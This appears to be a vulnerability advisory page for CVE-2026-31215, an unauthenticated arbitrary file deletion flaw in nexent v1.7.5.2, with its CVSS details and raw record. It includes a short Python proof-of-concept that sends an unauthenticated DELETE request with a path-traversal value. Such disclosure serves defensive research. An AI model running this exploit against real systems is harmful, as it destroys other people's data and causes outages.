Security Vulnerability Report
中文
CVE-2026-31215 CVSS 9.1 CRITICAL

CVE-2026-31215

Published: 2026-05-12 16:16:13
Last Modified: 2026-05-13 15:52:26
Source: [email protected]

Description

The nexent v1.7.5.2 backend service contains an unauthorized arbitrary file deletion vulnerability in its ElasticSearch service interface. The DELETE /{index_name}/documents endpoint lacks proper authentication and authorization controls and does not validate the user-supplied path_or_url parameter. This allows unauthenticated remote attackers to send crafted requests that trigger the deletion of arbitrary documents from ElasticSearch indices and corresponding files from the MinIO storage system. Successful exploitation leads to data destruction and denial of service.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

No configuration data available.

nexent v1.7.5.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def exploit_nexent(target_url, index_name, malicious_path): """ PoC for CVE-2026-31215: Unauthorized Arbitrary File Deletion in nexent v1.7.5.2 """ # Construct the vulnerable endpoint URL endpoint = f"{target_url}/{index_name}/documents" # Payload parameters targeting arbitrary files via path_or_url params = { "path_or_url": malicious_path } try: print(f"[*] Sending malicious DELETE request to: {endpoint}") print(f"[*] Targeting path: {malicious_path}") # Send unauthenticated DELETE request response = requests.delete(endpoint, params=params, timeout=10) if response.status_code == 200 or response.status_code == 204: print("[+] Exploit successful! Target resource deleted.") else: print(f"[-] Unexpected response. Status Code: {response.status_code}") print(f"Response body: {response.text}") except requests.exceptions.RequestException as e: print(f"[!] Error during request: {e}") # Example Usage # exploit_nexent("http://127.0.0.1:8080", "user_data", "../../config/database.yml")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31215", "sourceIdentifier": "[email protected]", "published": "2026-05-12T16:16:13.380", "lastModified": "2026-05-13T15:52:25.637", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "The nexent v1.7.5.2 backend service contains an unauthorized arbitrary file deletion vulnerability in its ElasticSearch service interface. The DELETE /{index_name}/documents endpoint lacks proper authentication and authorization controls and does not validate the user-supplied path_or_url parameter. This allows unauthenticated remote attackers to send crafted requests that trigger the deletion of arbitrary documents from ElasticSearch indices and corresponding files from the MinIO storage system. Successful exploitation leads to data destruction and denial of service."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://github.com/ModelEngine-Group/nexent", "source": "[email protected]"}, {"url": "https://www.notion.so/CVE-2026-31215-35d1e139318881f5946ed206d96e34d8", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.